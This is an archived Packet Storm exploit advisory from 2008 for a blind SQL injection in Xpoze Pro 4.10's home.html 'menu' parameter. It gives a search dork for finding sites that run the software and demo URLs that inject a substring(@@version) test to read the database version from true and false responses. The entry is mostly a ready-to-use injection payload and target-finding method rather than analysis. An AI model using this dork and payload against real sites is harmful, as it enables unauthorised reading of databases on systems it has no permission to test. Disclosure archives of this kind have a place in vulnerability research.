XPOZE Pro 4.10 Blind SQL Injection

2008-12-12T00:00:00
ID PACKETSTORM:72932
Type packetstorm
Reporter XaDoS
Modified 2008-12-12T00:00:00

Description

                                        
                                            `[■] Xpoze Pro (home menù) <= Blind $ql Injection  
  
  
>---------------------------------------<  
  
> AuToR: XaDoS (SecurityCode Team)  
> Contact M&: xados [at] hotmail [dot] it  
> B§g: Blind $ql inJection  
> SIte vuln: http://www.xpoze.org/  
  
>---------------------------------------<  
  
  
[■] ExPL0iT:  
  
Dork: " Powered by Xpoze "  
  
|: http://www.example.com/home.html?menu=[$qL]   
  
  
[■] D£M0:   
  
|: http://demo.xpoze.org/home.html?menu=110%20and%20substring(@@version,1,1)=5 [NO°°]  
  
|: http://demo.xpoze.org/home.html?menu=110%20and%20substring(@@version,1,1)=4 [y&$ ;-)]   
  
  
  
[■] Th4nKs::  
  
\> Str0ke </ \>Il pavimento</ \>sibilla</ \>Lo z00</ \>I FoxHound ( goto www.myspace.com/foxhoundindie )  
  
  
`